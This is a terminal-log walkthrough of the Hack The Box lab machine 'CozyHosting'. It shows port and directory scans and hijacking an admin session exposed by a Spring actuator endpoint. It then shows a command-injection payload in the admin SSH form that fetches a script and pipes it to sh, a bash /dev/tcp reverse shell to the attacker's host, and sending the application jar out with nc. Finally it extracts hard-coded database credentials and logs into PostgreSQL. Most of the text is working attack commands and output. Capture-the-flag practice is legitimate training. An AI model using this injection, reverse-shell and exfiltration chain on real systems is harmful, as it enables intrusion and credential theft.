HTB-CozyHosting

https://app.hackthebox.com/machines/CozyHosting

──(kwkl?kwkl)-[~]
└─$ tail -l /etc/hosts ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 1 ?



10.10.11.230 cozyhosting.htb

──(kwkl?kwkl)-[~]
└─$ nmap -A 10.10.11.230 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-23 20:47 HKT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 7.27% done; ETC: 20:50 (0:02:59 remaining)
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 10.12% done; ETC: 20:50 (0:02:31 remaining)
Nmap scan report for 10.10.11.230 (10.10.11.230)
Host is up (0.61s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT ? ? STATE SERVICE VERSION
22/tcp ? open ?ssh ? ? OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| ? 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ ?256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp ? open ?http ? ?nginx 1.18.0 (Ubuntu)
9999/tcp open ?abyss?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.99 seconds
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

┌──(kwkl?kwkl)-[~/tools/scan_tool]
└─$ sudo ./fscan_amd64 -h 10.10.11.230 ?

? ___ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?_ ? ?
?/ _ \ ? ? ___ ?___ _ __ __ _ ?___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| ? < ? ?
\____/ ? ? |___/\___|_| ?\__,_|\___|_|\_\ ?
? ? ? ? ? ? ? ? ? ? fscan version: 1.8.2
start infoscan
(icmp) Target 10.10.11.230 ? ?is alive
[*] Icmp alive hosts len is: 1
10.10.11.230:8000 open
10.10.11.230:22 open
10.10.11.230:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://10.10.11.230 ? ? ? code:301 len:178 ? ?title:301 Moved Permanently 跳轉url: http://cozyhosting.htb
[*] WebTitle: http://cozyhosting.htb ? ?code:200 len:12706 ?title:Cozy Hosting - Home
已完成 1/3 [-] ssh 10.10.11.230:22 root 123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
[+] http://cozyhosting.htb poc-yaml-springboot-env-unauth spring2
已完成 2/3 [-] ssh 10.10.11.230:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root sysadmin ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/3
[*] 掃描結束,耗時: 7m6.791807771s

┌──(kwkl?kwkl)-[~/tools/scan_tool/dirsearch-0.4.3]
└─$ ./dirsearch.py -u http://cozyhosting.htb/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?1 ?

?_|. _ _ ?_ ?_ ?_ _|_ ? ?v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kwkl/tools/scan_tool/dirsearch-0.4.3/reports/http_cozyhosting.htb/__23-09-30_10-56-44.txt

Target: http://cozyhosting.htb/

[10:56:44] Starting: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:32] 200 - ? ?0B ?- /;/login ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:32] 200 - ? ?0B ?- /;/json
[10:57:32] 200 - ? ?0B ?- /;/admin
[10:57:32] 200 - ? ?0B ?- /;admin/
[10:57:32] 200 - ? ?0B ?- /;login/
[10:57:32] 200 - ? ?0B ?- /;json/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:32] 400 - ?435B ?- /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:57:35] 400 - ?435B ?- /a%5c.aspx ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:38] 200 - ? ?0B ?- /actuator/;/auditevents ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:38] 200 - ? ?0B ?- /actuator/;/auditLog ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:39] 200 - ?634B ?- /actuator ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:39] 200 - ? ?0B ?- /actuator/;/conditions
[10:57:39] 200 - ? ?0B ?- /actuator/;/caches
[10:57:39] 200 - ? ?0B ?- /actuator/;/configprops
[10:57:39] 200 - ? ?0B ?- /actuator/;/beans
[10:57:39] 200 - ? ?0B ?- /actuator/;/configurationMetadata
[10:57:39] 200 - ? ?0B ?- /actuator/;/dump
[10:57:39] 200 - ? ?0B ?- /actuator/;/env
[10:57:39] 200 - ? ?0B ?- /actuator/;/features
[10:57:39] 200 - ? ?0B ?- /actuator/;/flyway
[10:57:39] 200 - ? ?0B ?- /actuator/;/events
[10:57:39] 200 - ? ?0B ?- /actuator/;/exportRegisteredServices
[10:57:39] 200 - ? ?0B ?- /actuator/;/health
[10:57:39] 200 - ? ?0B ?- /actuator/;/heapdump
[10:57:39] 200 - ? ?0B ?- /actuator/;/info
[10:57:39] 200 - ? ?0B ?- /actuator/;/httptrace
[10:57:39] 200 - ? ?0B ?- /actuator/;/healthcheck
[10:57:39] 200 - ? ?0B ?- /actuator/;/logfile
[10:57:39] 200 - ? ?0B ?- /actuator/;/jolokia
[10:57:39] 200 - ? ?0B ?- /actuator/;/loggers
[10:57:39] 200 - ? ?0B ?- /actuator/;/loggingConfig
[10:57:39] 200 - ? ?0B ?- /actuator/;/prometheus
[10:57:39] 200 - ? ?0B ?- /actuator/;/integrationgraph
[10:57:39] 200 - ? ?0B ?- /actuator/;/liquibase
[10:57:39] 200 - ? ?0B ?- /actuator/;/mappings
[10:57:39] 200 - ? ?0B ?- /actuator/;/metrics
[10:57:39] 200 - ? ?0B ?- /actuator/;/refresh
[10:57:39] 200 - ? ?0B ?- /actuator/;/registeredServices
[10:57:39] 200 - ? ?0B ?- /actuator/;/sessions
[10:57:39] 200 - ? ?0B ?- /actuator/;/releaseAttributes
[10:57:39] 200 - ? ?0B ?- /actuator/;/resolveAttributes
[10:57:39] 200 - ? ?0B ?- /actuator/;/ssoSessions
[10:57:39] 200 - ? ?0B ?- /actuator/;/sso
[10:57:39] 200 - ? ?0B ?- /actuator/;/scheduledtasks
[10:57:39] 200 - ? ?0B ?- /actuator/;/shutdown
[10:57:39] 200 - ? ?0B ?- /actuator/;/springWebflow
[10:57:39] 200 - ? ?0B ?- /actuator/;/statistics
[10:57:39] 200 - ? ?0B ?- /actuator/;/status
[10:57:39] 200 - ? ?0B ?- /actuator/;/trace
[10:57:39] 200 - ? ?0B ?- /actuator/;/threaddump
[10:57:40] 200 - ? ?5KB - /actuator/env ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:40] 200 - ? 15B ?- /actuator/health ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:41] 200 - ? 10KB - /actuator/mappings ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:41] 200 - ? 98B ?- /actuator/sessions ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:43] 200 - ?124KB - /actuator/beans ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:45] 401 - ? 97B ?- /admin ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:47] 200 - ? ?0B ?- /admin/%3bindex/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:54] 200 - ? ?0B ?- /Admin;/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:57:54] 200 - ? ?0B ?- /admin;/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:58:28] 200 - ? ?0B ?- /axis//happyaxis.jsp ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:58:28] 200 - ? ?0B ?- /axis2-web//HappyAxis.jsp ? ? ? ? ? ? ? ? ? ? ? ?
[10:58:28] 200 - ? ?0B ?- /axis2//axis2-web/HappyAxis.jsp ? ? ? ? ? ? ? ? ?
[10:58:38] 200 - ? ?0B ?- /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[10:59:02] 200 - ? ?0B ?- /engine/classes/swfupload//swfupload_f9.swf ? ? ?
[10:59:02] 200 - ? ?0B ?- /engine/classes/swfupload//swfupload.swf
[10:59:02] 500 - ? 73B ?- /error ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:59:04] 200 - ? ?0B ?- /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:59:05] 200 - ? ?0B ?- /extjs/resources//charts.swf ? ? ? ? ? ? ? ? ? ? ?
[10:59:28] 200 - ? ?0B ?- /html/js/misc/swfupload//swfupload.swf ? ? ? ? ? ?
[10:59:35] 200 - ? ?0B ?- /jkstatus; ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:59:40] 200 - ? ?4KB - /login ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:59:41] 200 - ? ?0B ?- /login.wdm%2e ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
[10:59:42] 204 - ? ?0B ?- /logout ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Task Completed ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?

Find. sessions

http://cozyhosting.htb/actuator/sessions

F0FD1F42518BC0B9959B98BED562DC79 "kanderson"

Using this sessionid

we can login in. As kanderson

kanderson%20||%20whoami

;'id'

http://10.10.16.51:5555/1@1

many times try

┌──(kwkl?kwkl)-[~/tools/scan_tool]
└─$ cat 1@1 ? ? ?
bash -c "bash -i>& /dev/tcp/10.10.16.51/6666 0>&1"
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~/tools/scan_tool]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.16.51 - - [01/Oct/2023 22:17:55] "GET /1@1 HTTP/1.1" 200 -
10.10.16.51 - - [01/Oct/2023 22:18:04] "GET /1@1 HTTP/1.1" 200 -
10.10.11.230 - - [01/Oct/2023 22:18:52] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:18:52] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:19:59] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:19:59] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:20:42] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:20:42] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:11] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:22:11] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:31] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:22:31] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:47] "GET /1@1 HTTP/1.1" 200 -
10.10.11.230 - - [01/Oct/2023 22:35:39] "GET /1@1 HTTP/1.1" 200 -

┌──(kwkl?kwkl)-[~]
└─$ nc -lvvp 6666 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?130 ?
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

raw head

POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=7BFD184ED7E857BC1FDD473077783C27//
Upgrade-Insecure-Requests: 1

host=1&username=;kanderson||curl$IFS$9http://10.10.16.51:5555/1@1|sh%0a

HTTP/1.1 504 Gateway Time-out
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Oct 2023 14:36:38 GMT
Content-Type: text/html
Content-Length: 176
Connection: close

<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

nc op！

┌──(kwkl?kwkl)-[~]
└─$ nc -lvvp 6666 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?130 ?
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:55596.
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ id


app@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
app@cozyhosting:/app$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ ls -al
ls -al
total 58856
drwxr-xr-x ?2 root root ? ? 4096 Aug 14 14:11 .
drwxr-xr-x 19 root root ? ? 4096 Aug 14 14:11 ..
-rw-r--r-- ?1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar
app@cozyhosting:/app$ nc 10.10.16.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
<6.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
nc: missing port number
app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
<6.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
nc: port number invalid: cloudhosting.zip
app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc: port number invalid: cloudhosting-0.0.1.jar
app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc: port number invalid: cloudhosting-0.0.1.jar
app@cozyhosting:/app$ nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar
nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar

recv

┌──(kwkl?kwkl)-[~]
└─$ nc -lvvp 7777 > cloudhosting.jar ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 130 ?
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:44434.

get the jar ball

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~]
└─$ cp cloudhosting.jar cloudhosting.zip
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~]
└─$ mkdir cloud ?

┌──(kwkl?kwkl)-[~/cloud]
└─$ mv ../cloudhosting.zip ../cloud
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~/cloud]
└─$ ls
BOOT-INF ?cloudhosting.zip ?META-INF ?org

┌──(kwkl?kwkl)-[~/cloud]
└─$ ls ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 1 ?
BOOT-INF ?cloudhosting.zip ?META-INF ?org
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~/cloud]
└─$ unzip cloudhosting.zip


┌──(kwkl?kwkl)-[~/cloud]
└─$ grep "password" ./ -r
grep: ./cloudhosting.zip：匹配到二進制文件
grep: ./BOOT-INF/lib/spring-security-crypto-6.0.1.jar：匹配到二進制文件
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: ? ?<glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: ? ?<glyph glyph-name="lock-password-line"
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf：匹配到二進制文件
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot：匹配到二進制文件
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class：匹配到二進制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class：匹配到二進制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class：匹配到二進制文件
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/templates/login.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<input type="password" name="password" id="yourPassword"
./BOOT-INF/classes/templates/login.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<div>Please enter your password!</div>
./BOOT-INF/classes/templates/login.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<p th:if="${param.error}" class="text-center small">Invalid username or password</p>
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~/cloud]
└─$ grep "username" ./ -r
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class：匹配到二進制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class：匹配到二進制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class：匹配到二進制文件
./BOOT-INF/classes/application.properties:spring.datasource.username=postgres
./BOOT-INF/classes/templates/login.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<input type="text" name="username" id="yourUsername"
./BOOT-INF/classes/templates/login.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<div>Please enter your username.</div>
./BOOT-INF/classes/templates/login.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<p th:if="${param.error}" class="text-center small">Invalid username or password</p>
./BOOT-INF/classes/templates/admin.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<input name="username" id="username" placeholder="user">
./BOOT-INF/classes/templates/admin.html: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?<label for="username">Username</label>
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~/cloud]
└─$

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

get the postgresql some info

./BOOT-INF/classes/application.properties:spring.datasource.username=postgres

./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR

using jd-gui

server.address=127.0.0.1 ?server.servlet.session.timeout=5m ?management.endpoints.web.exposure.include=health,beans,env,sessions,mappings ?management.endpoint.sessions.enabled = true ?spring.datasource.driver-class-name=org.postgresql.Driver ?spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect ?spring.jpa.hibernate.ddl-auto=none ?spring.jpa.database=POSTGRESQL ?spring.datasource.platform=postgres ?spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting ?spring.datasource.username=postgres ?spring.datasource.password=Vg&nvzAQ7XxR

package BOOT-INF.classes.htb.cloudhosting.scheduled;

import java.io.IOException; ?import java.util.concurrent.TimeUnit; ?import org.springframework.scheduling.annotation.Scheduled; ?import org.springframework.stereotype.Component;

@Component ?public class FakeUser { ?@Scheduled(timeUnit = TimeUnit.MINUTES, fixedDelay = 5L) ?public void login() throws IOException { ? System.out.println("Logging in user ..."); ? Runtime.getRuntime().exec(new String[] { "curl", "localhost:8080/login", "--request", "POST", "--header", "Content-Type: application/x-www-form-urlencoded", "--data-raw", "username=kanderson&password=MRdEQuv6~6P9", "-v" }); ?} }

Conn ?postgresql!

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
┌──(kwkl?kwkl)-[~]
└─$ nc -lvvp 6666 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?130 ?
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:46842.
bash: cannot set terminal process group (1064): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
app@cozyhosting:/app$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ psql -h localhost -p 5432 -U postgres -d cozyhosting
psql -h localhost -p 5432 -U postgres -d cozyhosting
Password for user postgres: Vg&nvzAQ7XxR

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

cozyhosting=# ls
ls
cozyhosting-# help
help
Use \? for help or press control-C to clear the input buffer.
cozyhosting-# \?
\?
WARNING: terminal is not fully functional
Press RETURN to continue ?

General
?\copyright ? ? ? ? ? ? show PostgreSQL usage and distribution terms
?\crosstabview [COLUMNS] execute query and display results in crosstab
?\errverbose ? ? ? ? ? ?show most recent error message at maximum verbosity
?\g [(OPTIONS)] [FILE] ?execute query (and send results to file or |pipe);
? ? ? ? ? ? ? ? ? ? ? ? \g with no arguments is equivalent to a semicolon
?\gdesc ? ? ? ? ? ? ? ? describe result of query, without executing it
?\gexec ? ? ? ? ? ? ? ? execute query, then execute each value in its result
?\gset [PREFIX] ? ? ? ? execute query and store results in psql variables
?\gx [(OPTIONS)] [FILE] as \g, but forces expanded output mode
?\q ? ? ? ? ? ? ? ? ? ? quit psql
?\watch [SEC] ? ? ? ? ? execute query every SEC seconds

Help
?\? [commands] ? ? ? ? ?show help on backslash commands
?\? options ? ? ? ? ? ? show help on psql command-line options
?\? variables ? ? ? ? ? show help on special variables
?\h [NAME] ? ? ? ? ? ? ?help on syntax of SQL commands, * for all commands

Query Buffer
?\e [FILE] [LINE] ? ? ? edit the query buffer (or file) with external editor
?\ef [FUNCNAME [LINE]] ?edit function definition with external editor
?\ev [VIEWNAME [LINE]] ?edit view definition with external editor
:
?\p ? ? ? ? ? ? ? ? ? ? show the contents of the query buffer
:

?\r ? ? ? ? ? ? ? ? ? ? reset (clear) the query buffer
:

?\s [FILE] ? ? ? ? ? ? ?display history or save it to file
:
?\w FILE ? ? ? ? ? ? ? ?write query buffer to file
:
:







Input/Output
:




?\copy ... ? ? ? ? ? ? ?perform SQL COPY with data stream to the client host
?\echo [-n] [STRING] ? ?write string to standard output (-n for no newline)
?\i FILE ? ? ? ? ? ? ? ?execute commands from file
?\ir FILE ? ? ? ? ? ? ? as \i, but relative to location of current script
?\o [FILE] ? ? ? ? ? ? ?send all query results to file or |pipe
?\qecho [-n] [STRING] ? write string to \o output stream (-n for no newline)
?\warn [-n] [STRING] ? ?write string to standard error (-n for no newline)
:
Conditional
?\if EXPR ? ? ? ? ? ? ? begin conditional block
?\elif EXPR ? ? ? ? ? ? alternative within current conditional block
?\else ? ? ? ? ? ? ? ? ?final alternative within current conditional block
?\endif ? ? ? ? ? ? ? ? end conditional block
:



:

Informational
?(options: S = show system objects, + = additional detail)
:
?\d[S+] ? ? ? ? ? ? ? ? list tables, views, and sequences
?\d[S+] ?NAME ? ? ? ? ? describe table, view, sequence, or index
:
?\da[S] ?[PATTERN] ? ? ?list aggregates
:
